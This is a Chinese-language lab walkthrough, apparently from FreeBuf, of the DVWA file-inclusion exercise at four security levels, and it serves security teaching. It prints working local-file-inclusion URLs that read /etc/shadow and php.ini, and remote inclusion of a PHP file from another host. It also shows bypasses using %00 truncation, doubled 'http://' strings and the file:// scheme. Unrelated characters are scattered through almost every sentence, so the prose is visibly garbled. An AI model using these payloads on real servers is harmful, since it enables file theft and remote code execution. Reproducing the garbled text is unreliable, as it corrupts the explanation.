文檔：http://www.freebuf.com/articles/web/119150.html

File Inclusion蜗顽，意思是文件包含（漏洞）陆赋，是指當(dāng)服務(wù)器開啟allow_url_include選項(xiàng)時(shí)搪缨，就可以通過php的某些特性函數(shù)（include()个少，require()和include_once()钥组，require_once()）利用url去動態(tài)包含文件狭瞎，此時(shí)如果沒有對文件來源進(jìn)行嚴(yán)格審查，就會導(dǎo)致任意文件讀取或者任意命令執(zhí)行欢唾。文件包含漏洞分為本地文件包含漏洞與遠(yuǎn)程文件包含漏洞且警，遠(yuǎn)程文件包含漏洞是因?yàn)殚_啟了php配置中的allow_url_fopen選項(xiàng)（選項(xiàng)開啟之后，服務(wù)器允許包含一個(gè)遠(yuǎn)程的文件）礁遣。

Low

服務(wù)端代碼：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?> 

可以看到斑芜，服務(wù)器端對page參數(shù)沒有做任何的過濾跟檢查。

服務(wù)器期望用戶的操作是點(diǎn)擊下面的三個(gè)鏈接祟霍，服務(wù)器會包含相應(yīng)的文件杏头，并將結(jié)果返回。需要特別說明的是沸呐，服務(wù)器包含文件時(shí)醇王，不管文件后綴是否是php，都會嘗試當(dāng)做php文件執(zhí)行崭添，如果文件內(nèi)容確為php寓娩，則會正常執(zhí)行并返回結(jié)果，如果不是，則會原封不動地打印文件內(nèi)容棘伴，所以文件包含漏洞常常會導(dǎo)致任意文件讀取與任意命令執(zhí)行寞埠。

image.png

而現(xiàn)實(shí)中，惡意的攻擊者是不會乖乖點(diǎn)擊這些鏈接的排嫌，因此page參數(shù)是不可控的畸裳。
因此可以嘗試?yán)眠@些漏洞
1.本地文件包含

image.png

這是正常情況下顯示的鏈接，我們可以修改page參數(shù)改變路徑來達(dá)到目的

構(gòu)造url

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=/etc/shadow

image.png

報(bào)錯(cuò)淳地，顯示沒有這個(gè)文件怖糊，說明不是服務(wù)器系統(tǒng)不是Linux，但同時(shí)暴露了服務(wù)器文件的絕對路徑
E:\wamp64\www\DVWA
構(gòu)造url（絕對路徑）

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=E:/wamp64/www/DVWA/php.ini

image.png

成功讀取了服務(wù)器的php.ini文件

構(gòu)造url（相對路徑）

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../../../../../wamp64/www/DVWA/php.ini

加這么多..\是為了保證到達(dá)服務(wù)器的E盤根目錄颇象，可以看到讀取是成功的伍伤。

image.png

同時(shí)我們看到，配置文件中的Magic_quote_gpc選項(xiàng)為off遣钳。在php版本小于5.3.4的服務(wù)器中扰魂，當(dāng)Magic_quote_gpc選項(xiàng)為off時(shí)，我們可以在文件名中使用%00進(jìn)行截?cái)嘣誊睿簿褪钦f文件名中%00后的內(nèi)容不會被識別劝评，即下面兩個(gè)url是完全等效的。

1. http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../../../../../wamp64/www/DVWA/php.ini
2. http://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../../../../../wamp64/www/DVWA/php.ini%001.php

使用%00截?cái)嗫梢岳@過某些過濾規(guī)則倦淀，例如要求page參數(shù)的后綴必須為php蒋畜，這時(shí)鏈接A會讀取失敗，而鏈接B可以繞過規(guī)則成功讀取撞叽。
2.遠(yuǎn)程文件包含

當(dāng)服務(wù)器的php配置中姻成，選項(xiàng)allow_url_fopen與allow_url_include為開啟狀態(tài)時(shí)，服務(wù)器會允許包含遠(yuǎn)程服務(wù)器上的文件愿棋，如果對文件來源沒有檢查的話科展，就容易導(dǎo)致任意遠(yuǎn)程代碼執(zhí)行。

在遠(yuǎn)程服務(wù)器192.168.xx.xxx上傳一個(gè)phpinfo.php文件糠雨，內(nèi)容如下

<?php
phpinfo();
?>

構(gòu)造url

http://172.21.xx.xx/DVWA/vulnerabilities/fi/?page=http://192.168.xx.xxx/phpinfo.php

圖片.png

成功在服務(wù)器上執(zhí)行了phpinfo函數(shù)
為了增加隱蔽性才睹，可以對http://192.168.xx.xx8/phpinfo.php進(jìn)行編碼

http://172.21.xx.xx/DVWA/vulnerabilities/fi/?page=%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%32%30%2E%31%32%38%2F%70%68%70%69%6E%66%6F%2E%70%68%70

Medium（中）

服務(wù)端核心代碼

 <?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

可以看到，Medium級別的代碼增加了str_replace函數(shù)甘邀，對page參數(shù)進(jìn)行了一定的處理砂竖，將”http:// ”、”https://”鹃答、 ” ../”、”..\”替換為空字符突硝，即刪除测摔。

嘗試?yán)茫?br> 使用str_replace函數(shù)是極其不安全的，因?yàn)榭梢允褂秒p寫繞過替換規(guī)則。

例如page=hthttp://tp://192.168.xx.xxx/phpinfo.php時(shí)锋八，str_replace函數(shù)會將http://刪除浙于，于是page=http://192.168.xx.xxx/phpinfo.php，成功執(zhí)行遠(yuǎn)程命令挟纱。

同時(shí)羞酗，因?yàn)樘鎿Q的只是“../”、“..\”紊服，所以對采用絕對路徑的方式包含文件是不會受到任何限制的檀轨。

1.本地文件包含( ../繞過)

http://172.21.96.34/DVWA/vulnerabilities/fi/?page=..././..././..././..././..././..././wamp64/www/DVWA/php.ini

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=E:/wamp64/www/DVWA/php.ini

絕對路徑不受任何影響，讀取成功

圖片.png

http://172.21.xx.xx/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.xx.xxx/phpinfo.php

圖片.png

經(jīng)過編碼后的url不能繞過替換規(guī)則欺嗤，因?yàn)榻獯a是在瀏覽器端完成的参萄，發(fā)送過去的page參數(shù)依然是http://192.168.xx.xxx/phpinfo.php，因此讀取失敗煎饼。

high

核心代碼：

 <?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

可以看到讹挎，High級別的代碼使用了fnmatch函數(shù)檢查page參數(shù)，要求page參數(shù)的開頭必須是file吆玖，服務(wù)器才會去包含相應(yīng)的文件筒溃。

High級別的代碼規(guī)定只能包含file開頭的文件，看似安全沾乘，不幸的是我們依然可以利用file協(xié)議繞過防護(hù)策略怜奖。file協(xié)議其實(shí)我們并不陌生，當(dāng)我們用瀏覽器打開一個(gè)本地文件時(shí)意鲸，用的就是file協(xié)議烦周，如下圖。

圖片.png

可以了解php偽協(xié)議怎顾，其中就有file協(xié)議

• file:// — 訪問本地文件系統(tǒng)
  PHP.ini：
  file:// 協(xié)議在雙off的情況下也可以正常使用读慎；
  allow_url_fopen ：off/on
  allow_url_include：off/on

使用方法：
file:// [文件的絕對路徑和文件名]
http://127.0.0.1/Myphp/phpwei.php?file=file:///e:/1.txt
<?php
include($_GET['file'])
?>
構(gòu)造url：

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///E:/wamp64/www/DVWA/php.ini

圖片.png

至于執(zhí)行任意命令，需要配合文件上傳漏洞利用槐雾。首先需要上傳一個(gè)內(nèi)容為php的文件夭委，然后再利用file協(xié)議去包含上傳文件（需要知道上傳文件的絕對路徑），從而實(shí)現(xiàn)任意命令執(zhí)行募强。

Impossible

服務(wù)端代碼：

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?> 

可以看到株灸，Impossible級別的代碼使用了白名單機(jī)制進(jìn)行防護(hù)，簡單粗暴擎值，page參數(shù)必須為“include.php”慌烧、“file1.php”、“file2.php”鸠儿、“file3.php”之一屹蚊，徹底杜絕了文件包含漏洞厕氨。